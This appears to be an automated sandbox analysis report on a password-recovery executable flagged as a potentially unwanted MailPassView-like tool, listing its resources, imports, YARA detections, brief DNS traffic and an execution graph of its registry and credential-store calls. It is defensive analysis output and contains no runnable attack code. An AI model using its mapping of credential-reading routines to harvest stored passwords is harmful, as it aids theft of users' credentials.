                .rsrc0x190000x2ec40x3000bc52b2709d30b43e91549b48a175bc0eFalse0.337158203125data4.213718411764263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_CURSOR0x196b80x134dataEnglishUnited States0.40584415584415584
                RT_BITMAP0x197ec0x3e8Device independent bitmap graphic, 112 x 16 x 4, image size 896HebrewIsrael0.466
                RT_BITMAP0x19bd40xd8Device independent bitmap graphic, 14 x 14 x 4, image size 112, resolution 3780 x 3780 px/mEnglishUnited States0.4305555555555556
                RT_BITMAP0x19cac0xd8Device independent bitmap graphic, 14 x 14 x 4, image size 112, resolution 3780 x 3780 px/mEnglishUnited States0.42592592592592593
                RT_ICON0x19d840x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640HebrewIsrael0.38306451612903225
                RT_ICON0x1a06c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192HebrewIsrael0.5641891891891891
                RT_ICON0x1a1940x128Device independent bitmap graphic, 16 x 32 x 4, image size 192HebrewIsrael0.3885135135135135
                RT_MENU0x1a2bc0x38cdataEnglishUnited States0.42731277533039647
                RT_MENU0x1a6480x1f2dataEnglishUnited States0.44377510040160645
                RT_DIALOG0x1a83c0xa2dataHebrewIsrael0.7592592592592593
                RT_DIALOG0x1a8e00x296dataHebrewIsrael0.48942598187311176
                RT_DIALOG0x1ab780x364dataHebrewIsrael0.3847926267281106
                RT_DIALOG0x1aedc0xfadataHebrewIsrael0.616
                RT_DIALOG0x1afd80x336dataEnglishUnited States0.49635036496350365
                RT_STRING0x1b3100x1f2dataEnglishUnited States0.4718875502008032
                RT_STRING0x1b5040x24dataEnglishUnited States0.4166666666666667
                RT_STRING0x1b5280x13adataEnglishUnited States0.4745222929936306
                RT_STRING0x1b6640x3eMatlab v4 mat-file (little endian) E, numeric, rows 0, columns 0EnglishUnited States0.6774193548387096
                RT_STRING0x1b6a40x48dataEnglishUnited States0.625
                RT_STRING0x1b6ec0x134dataEnglishUnited States0.5584415584415584
                RT_STRING0x1b8200xa6dataEnglishUnited States0.5602409638554217
                RT_STRING0x1b8c80x74Matlab v4 mat-file (little endian) N, numeric, rows 0, columns 0EnglishUnited States0.75
                RT_STRING0x1b93c0xaadataEnglishUnited States0.5470588235294118
                RT_STRING0x1b9e80x68dataEnglishUnited States0.6153846153846154
                RT_ACCELERATOR0x1ba500x50dataHebrewIsrael0.825
                RT_GROUP_CURSOR0x1baa00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                RT_GROUP_ICON0x1bab40x22dataHebrewIsrael1.0294117647058822
                RT_GROUP_ICON0x1bad80x14dataHebrewIsrael1.15
                RT_VERSION0x1baec0x26cdataHebrewIsrael0.5193548387096775
                RT_MANIFEST0x1bd580x16aASCII text, with CRLF line terminatorsEnglishUnited States0.649171270718232

                Imports

                DLLImport
                msvcrt.dllmemmove, wcschr, wcslen, wcsncmp, _itoa, _strlwr, qsort, strncmp, _snprintf, _mbsrchr, _mbsnbicmp, __dllonexit, _onexit, _c_exit, _exit, _XcptFilter, _cexit, _strnicmp, _acmdln, __getmainargs, _initterm, _memicmp, malloc, strrchr, _stricmp, free, modf, memcmp, strtoul, ??3@YAXPAX@Z, ??2@YAPAXI@Z, memcpy, sprintf, _mbsicmp, atoi, _strcmpi, strlen, strcmp, exit, _adjust_fdiv, wcsstr, log, _mbscmp, strchr, _purecall, strncat, abs, strcat, _ultoa, strcpy, memset, __p__commode, __p__fmode, __set_app_type, _controlfp, _except_handler3, __setusermatherr
                COMCTL32.dllCreateToolbarEx, ImageList_Create, ImageList_AddMasked, ImageList_SetImageCount, ImageList_ReplaceIcon
                RPCRT4.dllUuidFromStringA
                KERNEL32.dllGetCurrentDirectoryA, GetModuleHandleA, SetCurrentDirectoryA, GetCurrentProcess, ExitProcess, GetCurrentProcessId, ReadProcessMemory, OpenProcess, GetStdHandle, GetPrivateProfileIntA, EnumResourceNamesA, WritePrivateProfileStringA, GetComputerNameA, GetFileSize, CreateFileA, GlobalUnlock, GlobalLock, GetTempPathA, GlobalAlloc, CloseHandle, FindResourceA, LoadResource, EnumResourceTypesA, SizeofResource, LockResource, DeleteFileA, GetStartupInfoA, GetPrivateProfileStringA, MultiByteToWideChar, WideCharToMultiByte, ExpandEnvironmentStringsA, LocalFree, WriteFile, GetPrivateProfileSectionA, FreeLibrary, GetProcAddress, LoadLibraryA, GetModuleFileNameA, FindFirstFileA, FindNextFileA, SetFilePointer, GetLastError, LoadLibraryExA, GetFileAttributesA, GetTempFileNameA, FindClose, FormatMessageA, GetWindowsDirectoryA, ReadFile, GetVersionExA
                USER32.dllGetClassNameA, GetMessageA, TranslateMessage, RegisterWindowMessageA, PostQuitMessage, TrackPopupMenu, PostMessageA, GetFocus, DispatchMessageA, DrawTextExA, IsDialogMessageA, GetWindowTextA, GetMenuItemInfoA, EnumChildWindows, DestroyMenu, GetDlgCtrlID, DialogBoxParamA, ShowWindow, SetCursor, LoadCursorA, ChildWindowFromPoint, GetSysColorBrush, EndDialog, GetDlgItem, CreateWindowExA, InvalidateRect, SetDlgItemInt, BeginPaint, GetClientRect, GetWindow, SetDlgItemTextA, DrawFrameControl, GetDlgItemTextA, SendDlgItemMessageA, SetWindowTextA, GetWindowRect, GetSystemMetrics, GetDlgItemInt, DeferWindowPos, EndPaint, DefWindowProcA, TranslateAcceleratorA, MessageBoxA, GetWindowPlacement, RegisterClassA, UpdateWindow, SetMenu, LoadAcceleratorsA, SetWindowPos, SendMessageA, LoadIconA, GetWindowLongA, SetWindowLongA, SetFocus, BeginDeferWindowPos, EndDeferWindowPos, CheckMenuItem, GetMenuItemCount, SetClipboardData, GetMenuStringA, EnableWindow, DestroyWindow, GetCursorPos, LoadImageA, GetSysColor, MapWindowPoints, GetMenu, CloseClipboard, GetParent, OpenClipboard, GetDC, EmptyClipboard, MoveWindow, GetSubMenu, EnableMenuItem, ReleaseDC, LoadMenuA, LoadStringA, CreateDialogParamA, ModifyMenuA
                GDI32.dllGetDeviceCaps, SetTextColor, CreateFontIndirectA, SetBkMode, DeleteObject, GetTextExtentPoint32A, SetBkColor, SelectObject
                comdlg32.dllGetOpenFileNameA, GetSaveFileNameA, FindTextA
                ADVAPI32.dllRegEnumKeyA, RegEnumKeyExA, RegQueryValueExA, RegOpenKeyExA, RegDeleteKeyA, GetUserNameA, RegCloseKey
                SHELL32.dllSHBrowseForFolderA, SHGetPathFromIDListA, SHGetMalloc, ShellExecuteA
                ole32.dllCoInitialize, CoTaskMemFree, CoUninitialize

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                HebrewIsrael

                Network Behavior

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                May 23, 2024 01:32:18.235605955 CEST5364857162.159.36.2192.168.2.9
                May 23, 2024 01:32:18.930286884 CEST53578891.1.1.1192.168.2.9

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                System Behavior

                General

                Target ID:0
                Start time:19:31:31
                Start date:22/05/2024
                Path:C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe"
                Imagebase:0x400000
                File size:102'400 bytes
                MD5 hash:A878DD0345C3721D93791AB68FCC1FAF
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000000.1536326687.0000000000413000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.2791709876.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low
                Has exited:false

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:14.9%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:7.5%
                  Total number of Nodes:1808
                  Total number of Limit Nodes:59
                  execution_graph 6357 40174e 6358 40175a 6357->6358 6359 40177a 6358->6359 6413 4070d9 6358->6413 6361 401790 6359->6361 6362 4017ee DefWindowProcA 6359->6362 6366 40a632 SendMessageA 6361->6366 6377 40b656 6361->6377 6363 4017a7 6362->6363 6418 405e36 LoadCursorA SetCursor 6366->6418 6368 40a656 SendMessageA 6373 40ef05 FreeLibrary 6368->6373 6376 4047fb FreeLibrary 6368->6376 6419 4047aa 6368->6419 6427 403c17 6368->6427 6503 40f1b0 RegOpenKeyExA 6368->6503 6369 40a67f 6504 40a5a1 6369->6504 6373->6369 6376->6369 6378 40b7a1 6377->6378 6379 40b671 6377->6379 6380 40b7f1 6378->6380 6381 40b7aa 6378->6381 6382 40b793 6379->6382 6383 40b677 6379->6383 6385 40a632 466 API calls 6380->6385 6384 40b7ad 6381->6384 6407 40b7c0 6381->6407 6386 40a5a1 19 API calls 6382->6386 6387 40b680 6383->6387 6388 40b769 6383->6388 6391 40b7b2 SetFocus 6384->6391 6411 40b6b3 6384->6411 6394 40b79f 6385->6394 6386->6394 6389 40b689 6387->6389 6390 40b73d 6387->6390 6392 40b770 PostMessageA 6388->6392 6393 40b785 GetFocus 6388->6393 6396 40b6b8 6389->6396 6401 40b68e 6389->6401 6397 40b74c LoadCursorA SetCursor 6390->6397 6390->6411 6391->6411 6392->6411 6393->6411 7726 40a3e9 6394->7726 6395 40b837 7715 401939 6395->7715 6403 40b6ca SetBkMode SetTextColor SelectObject DrawTextExA SelectObject 6396->6403 6396->6411 6404 40b845 6397->6404 6399 40b818 7772 409ee8 6399->7772 6400 40b81f 6400->6395 6406 40b824 SetFocus 6400->6406 6401->6411 7721 40b48c GetCursorPos GetSubMenu 6401->7721 6403->6411 6404->6363 6406->6395 6410 40a5a1 19 API calls 6407->6410 6412 40b7dd SetFocus 6410->6412 6411->6395 6411->6399 6411->6400 6412->6394 6414 4070e3 6413->6414 6415 4070f4 ??2@YAPAXI memset memcpy 6413->6415 6414->6415 6417 40713e 6414->6417 6416 407137 ??3@YAXPAX 6415->6416 6415->6417 6416->6417 6417->6359 6418->6368 6420 4047fb FreeLibrary 6419->6420 6421 4047b1 LoadLibraryA 6420->6421 6422 4047c2 GetProcAddress 6421->6422 6423 4047e4 6421->6423 6422->6423 6424 4047da 6422->6424 6425 4047f7 6423->6425 6426 4047fb FreeLibrary 6423->6426 6424->6423 6425->6369 6426->6425 6428 40ef05 FreeLibrary 6427->6428 6429 403c31 LoadLibraryA 6428->6429 6430 403c75 6429->6430 6431 403c45 GetProcAddress 6429->6431 6433 40ef05 FreeLibrary 6430->6433 6431->6430 6432 403c5f 6431->6432 6432->6430 6436 403c6c 6432->6436 6434 403c7c 6433->6434 6435 4047aa 3 API calls 6434->6435 6437 403c87 6435->6437 6436->6434 6516 4036a6 6437->6516 6440 4036a6 27 API calls 6441 403c9b 6440->6441 6442 4036a6 27 API calls 6441->6442 6443 403ca5 6442->6443 6444 4036a6 27 API calls 6443->6444 6445 403caf 6444->6445 6528 4076b7 6445->6528 6453 403ce6 6454 403cf8 6453->6454 6707 402b92 memset 6453->6707 6574 40f1b0 RegOpenKeyExA 6454->6574 6457 403d0b 6458 403d1d 6457->6458 6459 402b92 37 API calls 6457->6459 6575 402c1e 6458->6575 6459->6458 6462 406282 GetVersionExA 6463 403d32 6462->6463 6593 40f1b0 RegOpenKeyExA 6463->6593 6465 403d52 6466 403d62 6465->6466 6715 402ae3 memset 6465->6715 6594 40f1b0 RegOpenKeyExA 6466->6594 6469 403d88 6470 403d98 6469->6470 6471 402ae3 44 API calls 6469->6471 6595 40f1b0 RegOpenKeyExA 6470->6595 6471->6470 6473 403dbe 6474 403dce 6473->6474 6475 402ae3 44 API calls 6473->6475 6476 40ef1c FreeLibrary 6474->6476 6475->6474 6477 403dde 6476->6477 6478 4047fb FreeLibrary 6477->6478 6479 403de9 6478->6479 6596 402f9c 6479->6596 6482 402f9c 34 API calls 6483 403e01 6482->6483 6612 403278 6483->6612 6492 403e3c 6494 403e74 6492->6494 6495 403e47 strcpy 6492->6495 6661 40e057 6494->6661 6496 40d9d8 187 API calls 6495->6496 6496->6494 6503->6369 7676 4087b1 6504->7676 6511 40a60c 6513 40a630 SetCursor SetFocus SendMessageA 6511->6513 6514 40a616 SendMessageA 6511->6514 6512 407a69 12 API calls 6515 40a5e9 sprintf strcat 6512->6515 6513->6363 6514->6513 6515->6511 6517 4036bc 6516->6517 6520 403786 6516->6520 6736 40ef77 UuidFromStringA UuidFromStringA 6517->6736 6520->6440 6521 4036d7 strchr 6521->6520 6522 4036f1 6521->6522 6740 402197 6522->6740 6525 403765 strcpy 6743 4023c6 _mbscmp 6525->6743 6526 40374a sprintf 6526->6525 6529 4076c7 6528->6529 6780 4073b6 11 API calls 6529->6780 6533 4076e5 6534 4076f0 memset 6533->6534 6535 403cbb 6533->6535 6783 40f276 RegEnumKeyExA 6534->6783 6546 407306 6535->6546 6537 4077b7 RegCloseKey 6537->6535 6539 40771c 6539->6537 6540 407741 memset 6539->6540 6784 40f1b0 RegOpenKeyExA 6539->6784 6801 40f276 RegEnumKeyExA 6539->6801 6785 40f1f1 RegQueryValueExA 6540->6785 6543 407779 6786 407570 strlen 6543->6786 6803 40f1b0 RegOpenKeyExA 6546->6803 6548 407328 6549 403cc7 6548->6549 6550 40732f memset 6548->6550 6558 4077c5 6549->6558 6804 40f276 RegEnumKeyExA 6550->6804 6552 4073a8 RegCloseKey 6552->6549 6554 407358 6554->6552 6805 40f1b0 RegOpenKeyExA 6554->6805 6806 4071d6 memset 6554->6806 6822 40f276 RegEnumKeyExA 6554->6822 6827 404651 6558->6827 6563 40781c wcslen 6564 4079cd 6563->6564 6570 40784f 6563->6570 6835 4046cc 6564->6835 6565 407859 wcsncmp 6565->6570 6567 4047aa 3 API calls 6567->6570 6568 4047fb FreeLibrary 6568->6570 6569 4078f1 memset 6569->6570 6571 40791e memcpy wcschr 6569->6571 6570->6564 6570->6565 6570->6567 6570->6568 6570->6569 6570->6571 6572 4079a1 LocalFree 6570->6572 6838 4046e1 strcpy 6570->6838 6571->6570 6572->6570 6573 40f1b0 RegOpenKeyExA 6573->6453 6574->6457 6839 40f1b0 RegOpenKeyExA 6575->6839 6577 402c3b 6578 402d66 6577->6578 6579 402c48 memset 6577->6579 6578->6462 6840 40f276 RegEnumKeyExA 6579->6840 6581 402d5d RegCloseKey 6581->6578 6582 40f232 3 API calls 6583 402ca5 memset sprintf 6582->6583 6841 40f1b0 RegOpenKeyExA 6583->6841 6585 402ce9 6586 402cfb sprintf 6585->6586 6587 402b92 37 API calls 6585->6587 6842 40f1b0 RegOpenKeyExA 6586->6842 6587->6586 6589 402c73 6589->6581 6589->6582 6590 402b92 37 API calls 6589->6590 6592 402d5b 6589->6592 6843 40f276 RegEnumKeyExA 6589->6843 6590->6589 6592->6581 6593->6465 6594->6469 6595->6473 6844 40f1b0 RegOpenKeyExA 6596->6844 6598 402fba 6599 402fc7 memset 6598->6599 6600 4030ed 6598->6600 6845 40f276 RegEnumKeyExA 6599->6845 6600->6482 6602 4030e3 RegCloseKey 6602->6600 6603 40f232 3 API calls 6604 403019 memset sprintf 6603->6604 6846 40f1b0 RegOpenKeyExA 6604->6846 6606 403063 memset 6847 40f276 RegEnumKeyExA 6606->6847 6607 40f276 RegEnumKeyExA 6611 402ff4 6607->6611 6609 4030ba RegCloseKey 6609->6611 6611->6602 6611->6603 6611->6606 6611->6607 6611->6609 6848 402d74 6611->6848 6613 403296 6612->6613 6614 40336a 6612->6614 6615 402197 memset 6613->6615 6627 4034a5 memset memset 6614->6627 6616 4032a2 6615->6616 6900 403127 6616->6900 6619 4032b9 memset GetPrivateProfileSectionA 6619->6614 6621 4032f0 6619->6621 6620 4023c6 16 API calls 6620->6619 6621->6614 6622 40335c strlen 6621->6622 6623 402197 memset 6621->6623 6625 403127 5 API calls 6621->6625 6626 4023c6 16 API calls 6621->6626 6622->6614 6622->6621 6624 403311 strchr 6623->6624 6624->6621 6625->6621 6626->6621 6628 40f232 3 API calls 6627->6628 6629 403500 6628->6629 6630 403540 6629->6630 6631 403507 strcpy 6629->6631 6635 403946 6630->6635 6632 405f29 2 API calls 6631->6632 6633 403526 strcat 6632->6633 6926 4033b1 6633->6926 6959 4046e1 strcpy 6635->6959 6637 40398e RegOpenKeyExA 6639 40396c 6637->6639 6638 4039c0 RegOpenKeyExA 6638->6639 6639->6637 6639->6638 6643 403a04 6639->6643 6960 40dc39 6639->6960 6976 40db04 RegQueryValueExA 6639->6976 6991 4038a9 6639->6991 6644 4047fb FreeLibrary 6643->6644 6645 403a10 6644->6645 6646 40378b memset memset 6645->6646 7008 411622 memset 6646->7008 6649 4038a3 6649->6492 6724 40d9d8 6649->6724 6650 402197 memset 6651 4037ef 6650->6651 6652 4060da 2 API calls 6651->6652 6653 403804 6652->6653 6654 4060da 2 API calls 6653->6654 6655 403816 strchr 6654->6655 6656 403845 strcpy 6655->6656 6657 403858 strlen 6655->6657 6658 403880 strcpy 6656->6658 6657->6658 6659 403865 sprintf 6657->6659 6660 4023c6 16 API calls 6658->6660 6659->6658 6660->6649 6662 412360 6661->6662 6663 40e067 RegOpenKeyExA 6662->6663 6664 40e092 RegOpenKeyExA 6663->6664 6665 403e80 6663->6665 6666 40e184 RegCloseKey 6664->6666 6667 40e0ac RegQueryValueExA 6664->6667 6675 40dec3 6665->6675 6666->6665 6668 40e17a RegCloseKey 6667->6668 6669 40e0db 6667->6669 6668->6666 6670 4047aa 3 API calls 6669->6670 6671 40e0e8 6670->6671 6671->6668 6672 40e170 LocalFree 6671->6672 6673 40e134 memcpy memcpy 6671->6673 6672->6668 7095 40dd59 6673->7095 6676 406282 GetVersionExA 6675->6676 6677 40dee4 6676->6677 6678 404651 7 API calls 6677->6678 6685 40df00 6678->6685 6679 4046cc FreeLibrary 6680 403e86 6679->6680 6687 4113c4 memset 6680->6687 6681 40e03d 6681->6679 6682 40df6a memset WideCharToMultiByte 6683 40df9a _strnicmp 6682->6683 6682->6685 6684 40dfb2 WideCharToMultiByte 6683->6684 6683->6685 6684->6685 6686 40dfdf WideCharToMultiByte 6684->6686 6685->6681 6685->6682 6686->6685 6688 40f4ca 10 API calls 6687->6688 6689 411403 6688->6689 7109 406763 strlen strlen 6689->7109 6694 40f4ca 10 API calls 6695 41142a 6694->6695 6696 406763 3 API calls 6695->6696 6697 411434 6696->6697 6698 4112ec 65 API calls 6697->6698 6699 411440 memset memset 6698->6699 6700 40f232 3 API calls 6699->6700 6701 411493 ExpandEnvironmentStringsA strlen 6700->6701 6702 4114ce _stricmp 6701->6702 6703 4114bf 6701->6703 6704 403e92 6702->6704 6705 4114e6 6702->6705 6703->6702 6704->6369 6706 4112ec 65 API calls 6705->6706 6706->6704 7239 40f276 RegEnumKeyExA 6707->7239 6709 402c14 RegCloseKey 6709->6454 6711 402bc6 6711->6709 7240 40f1b0 RegOpenKeyExA 6711->7240 7241 4025c5 6711->7241 7255 40f276 RegEnumKeyExA 6711->7255 7278 40f276 RegEnumKeyExA 6715->7278 6717 402b7c RegCloseKey 6717->6466 6718 4060da 2 API calls 6719 402b19 6718->6719 6719->6717 6719->6718 6723 402b79 6719->6723 7279 40f1b0 RegOpenKeyExA 6719->7279 7280 402a5e memset 6719->7280 7288 40f276 RegEnumKeyExA 6719->7288 6723->6717 6725 406fd2 9 API calls 6724->6725 6733 40da11 6725->6733 6726 40702d 9 API calls 6726->6733 6727 40da83 6729 4070c5 FindClose 6727->6729 6728 406f97 2 API calls 6728->6733 6730 40da8c 6729->6730 6730->6492 6731 40d9d8 186 API calls 6731->6733 6732 40da3d _stricmp 6732->6733 6733->6726 6733->6727 6733->6728 6733->6731 6733->6732 7323 406155 GetFileAttributesA 6733->7323 7324 40d7c1 6733->7324 6737 4036cf 6736->6737 6738 40efa1 6736->6738 6737->6520 6737->6521 6738->6737 6739 40efd2 memcpy CoTaskMemFree 6738->6739 6739->6737 6750 406578 memset 6740->6750 6742 4021a8 strcpy strcpy strlen 6742->6525 6742->6526 6744 4023f1 6743->6744 6748 4023e5 6743->6748 6751 401a0f strlen 6744->6751 6763 4090d6 6748->6763 6750->6742 6752 401bab 6751->6752 6759 401a63 6751->6759 6753 401bf8 log log 6752->6753 6754 401c3e 6752->6754 6755 401c30 free 6753->6755 6756 401c3a _mbsicmp 6753->6756 6754->6756 6757 401c44 free 6754->6757 6755->6756 6756->6748 6757->6756 6759->6752 6760 401b10 abs 6759->6760 6761 4045f2 4 API calls 6759->6761 6774 4045f2 6759->6774 6760->6759 6762 401b46 abs 6761->6762 6762->6759 6764 4090e3 6763->6764 6765 4090fe 6763->6765 6764->6765 6766 40912b memcpy 6764->6766 6767 409122 free 6765->6767 6768 409147 6765->6768 6772 402424 6766->6772 6771 409157 memcpy 6767->6771 6770 406104 3 API calls 6768->6770 6770->6771 6771->6772 6772->6520 6775 40461b 6774->6775 6776 4045fd 6774->6776 6775->6759 6777 404605 free 6776->6777 6778 40460e 6776->6778 6777->6775 6779 406104 3 API calls 6778->6779 6779->6775 6781 407501 6780->6781 6782 40f1b0 RegOpenKeyExA 6781->6782 6782->6533 6783->6539 6784->6539 6785->6543 6787 40758e 6786->6787 6788 4076b0 RegCloseKey 6787->6788 6789 4075a2 memset 6787->6789 6788->6539 6790 4075d3 6789->6790 6802 4046e1 strcpy 6790->6802 6792 407610 6793 4047aa 3 API calls 6792->6793 6794 407615 6793->6794 6795 4076a5 6794->6795 6797 40765b memcpy 6794->6797 6796 4047fb FreeLibrary 6795->6796 6796->6788 6798 4060da 2 API calls 6797->6798 6799 40768f LocalFree 6798->6799 6799->6795 6801->6539 6802->6792 6803->6548 6804->6554 6805->6554 6823 40f214 RegQueryValueExA 6806->6823 6808 407233 6809 4072ff RegCloseKey 6808->6809 6824 4046e1 strcpy 6808->6824 6809->6554 6811 407249 6812 4047aa 3 API calls 6811->6812 6813 40724e 6812->6813 6814 4072e7 6813->6814 6816 407279 WideCharToMultiByte LocalFree 6813->6816 6815 4047fb FreeLibrary 6814->6815 6815->6809 6825 40f1f1 RegQueryValueExA 6816->6825 6818 4072c3 6826 40f1f1 RegQueryValueExA 6818->6826 6820 4072d9 6821 4060da 2 API calls 6820->6821 6821->6814 6822->6554 6823->6808 6824->6811 6825->6818 6826->6820 6828 4046cc FreeLibrary 6827->6828 6829 404659 LoadLibraryA 6828->6829 6830 4046c7 6829->6830 6831 40466a GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 6829->6831 6830->6563 6830->6564 6832 4046b3 6831->6832 6833 4046b9 6832->6833 6834 4046cc FreeLibrary 6832->6834 6833->6830 6834->6830 6836 4046d2 FreeLibrary 6835->6836 6837 403cd3 6835->6837 6836->6837 6837->6573 6838->6570 6839->6577 6840->6589 6841->6585 6842->6589 6843->6589 6844->6598 6845->6611 6846->6611 6847->6611 6887 40f1b0 RegOpenKeyExA 6848->6887 6850 402d8c 6851 402f98 6850->6851 6852 402197 memset 6850->6852 6851->6611 6853 402dac 6852->6853 6854 402197 memset 6853->6854 6855 402db7 6854->6855 6888 40f1f1 RegQueryValueExA 6855->6888 6857 402df3 6889 40f1f1 RegQueryValueExA 6857->6889 6859 402e09 6890 40f1f1 RegQueryValueExA 6859->6890 6861 402e1f 6891 40f1f1 RegQueryValueExA 6861->6891 6863 402e35 6892 40f1ca RegQueryValueExA 6863->6892 6865 402e46 6893 40f1ca RegQueryValueExA 6865->6893 6867 402e57 6894 40f214 RegQueryValueExA 6867->6894 6869 402e72 strcpy strcpy 6895 40f1f1 RegQueryValueExA 6869->6895 6872 402eb9 6896 40f1f1 RegQueryValueExA 6872->6896 6874 402ecf 6897 40f1ca RegQueryValueExA 6874->6897 6876 402ee3 6898 40f1ca RegQueryValueExA 6876->6898 6878 402ef7 6899 40f214 RegQueryValueExA 6878->6899 6880 402f12 strcpy strcpy 6882 402f48 6880->6882 6883 402f68 6882->6883 6884 4023c6 16 API calls 6882->6884 6885 402f8f RegCloseKey 6883->6885 6886 4023c6 16 API calls 6883->6886 6884->6883 6885->6851 6886->6885 6887->6850 6888->6857 6889->6859 6890->6861 6891->6863 6892->6865 6893->6867 6894->6869 6895->6872 6896->6874 6897->6876 6898->6878 6899->6880 6921 4030f9 6900->6921 6902 40316a 6903 4030f9 GetPrivateProfileStringA 6902->6903 6904 403199 6903->6904 6905 4030f9 GetPrivateProfileStringA 6904->6905 6906 4031b2 6905->6906 6907 4030f9 GetPrivateProfileStringA 6906->6907 6908 4031c8 6907->6908 6909 4030f9 GetPrivateProfileStringA 6908->6909 6910 4031e1 6909->6910 6911 4030f9 GetPrivateProfileStringA 6910->6911 6912 4031f9 6911->6912 6913 403254 6912->6913 6924 401d19 strlen 6912->6924 6913->6619 6913->6620 6915 40321a 6915->6913 6916 4030f9 GetPrivateProfileStringA 6915->6916 6917 403234 6916->6917 6917->6913 6918 403239 strchr 6917->6918 6918->6913 6919 40324a 6918->6919 6920 4060da 2 API calls 6919->6920 6920->6913 6922 403113 GetPrivateProfileStringA 6921->6922 6922->6902 6925 401d34 6924->6925 6925->6915 6927 402197 memset 6926->6927 6928 4033c6 6927->6928 6929 402197 memset 6928->6929 6930 4033d1 6929->6930 6951 403371 GetPrivateProfileStringA 6930->6951 6932 403402 6952 403371 GetPrivateProfileStringA 6932->6952 6934 403414 6953 403371 GetPrivateProfileStringA 6934->6953 6936 403426 6954 403371 GetPrivateProfileStringA 6936->6954 6938 403438 6955 403371 GetPrivateProfileStringA 6938->6955 6940 40344a 6956 403371 GetPrivateProfileStringA 6940->6956 6942 40345c 6943 40347e 6942->6943 6957 403392 strlen 6942->6957 6945 4034a0 6943->6945 6947 403392 strlen 6943->6947 6945->6630 6949 403492 6947->6949 6948 4023c6 16 API calls 6948->6943 6950 4023c6 16 API calls 6949->6950 6950->6945 6951->6932 6952->6934 6953->6936 6954->6938 6955->6940 6956->6942 6958 40339f 6957->6958 6958->6948 6959->6639 7004 4046e1 strcpy 6960->7004 6962 40dc51 6963 404651 7 API calls 6962->6963 6964 40dc5f 6963->6964 6965 40dd39 6964->6965 6967 4047aa 3 API calls 6964->6967 6966 4046cc FreeLibrary 6965->6966 6968 40dd48 6966->6968 6971 40dc6c 6967->6971 6969 4047fb FreeLibrary 6968->6969 6970 40dd53 6969->6970 6970->6639 6971->6965 6972 40dcee WideCharToMultiByte 6971->6972 6973 40dd30 LocalFree 6972->6973 6974 40dd0f strlen 6972->6974 6973->6965 6974->6973 6975 40dd1f strcpy 6974->6975 6975->6973 6977 40db41 6976->6977 6978 40dc25 RegCloseKey 6976->6978 6977->6978 6987 40dbc7 6977->6987 7005 4046e1 strcpy 6977->7005 6978->6639 6980 40db62 6982 4047aa 3 API calls 6980->6982 6988 40db67 6982->6988 6983 40dbf1 RegQueryValueExA 6983->6978 6984 40dc12 6983->6984 6984->6978 6985 40dbbc 6986 4047fb FreeLibrary 6985->6986 6986->6987 6987->6978 7006 40132a strlen 6987->7006 6988->6985 6989 40dbb3 LocalFree 6988->6989 6990 40db97 memcpy 6988->6990 6989->6985 6990->6989 6992 402197 memset 6991->6992 6993 4038c0 6992->6993 6994 4060da 2 API calls 6993->6994 6995 4038da 6994->6995 6996 4060da 2 API calls 6995->6996 6997 4038e7 6996->6997 6998 4060da 2 API calls 6997->6998 6999 4038f4 strchr 6998->6999 7000 403905 6999->7000 7001 403908 strcpy 6999->7001 7000->7001 7002 4023c6 16 API calls 7001->7002 7003 40393f 7002->7003 7003->6639 7004->6962 7005->6980 7007 401349 7006->7007 7007->6983 7019 40f1b0 RegOpenKeyExA 7008->7019 7010 41165c 7011 4037db 7010->7011 7020 40f1f1 RegQueryValueExA 7010->7020 7011->6649 7011->6650 7013 411675 7014 4116ad RegCloseKey 7013->7014 7021 40f1f1 RegQueryValueExA 7013->7021 7014->7011 7016 411692 7016->7014 7022 41194a 7016->7022 7019->7010 7020->7013 7021->7016 7034 411533 strlen 7022->7034 7024 411964 7025 411986 7024->7025 7036 4116be 7024->7036 7028 4116ab 7025->7028 7065 411a0f memset memset memset 7025->7065 7028->7014 7029 4119a1 7029->7028 7030 4119c1 memset 7029->7030 7031 4116be 21 API calls 7030->7031 7032 4119ed 7031->7032 7032->7028 7033 4119f7 strcpy 7032->7033 7033->7028 7035 411552 7034->7035 7035->7024 7037 412360 7036->7037 7038 4116cb memset 7037->7038 7039 411533 strlen 7038->7039 7040 4116f9 strlen 7039->7040 7041 411941 7040->7041 7042 411712 7040->7042 7041->7025 7042->7041 7043 41171a memset memset memset memset 7042->7043 7044 411794 7043->7044 7080 40be4e 7044->7080 7046 4117a2 7087 40beec 7046->7087 7048 4117b1 memcpy 7049 4117cd 7048->7049 7050 40be4e 3 API calls 7049->7050 7051 4117de 7050->7051 7052 40beec 5 API calls 7051->7052 7053 4117ea memcpy memcpy 7052->7053 7054 411818 7053->7054 7055 40be4e 3 API calls 7054->7055 7056 411829 7055->7056 7057 40beec 5 API calls 7056->7057 7059 411835 7057->7059 7058 4118d2 strcpy 7060 4118f0 7058->7060 7059->7058 7059->7059 7061 40be4e 3 API calls 7060->7061 7062 4118fe 7061->7062 7063 40beec 5 API calls 7062->7063 7064 41190a memcpy memcpy 7063->7064 7064->7041 7066 411533 strlen 7065->7066 7067 411a73 strlen 7066->7067 7068 411a8b 7067->7068 7079 411b1a 7067->7079 7069 411a93 memcpy memcpy 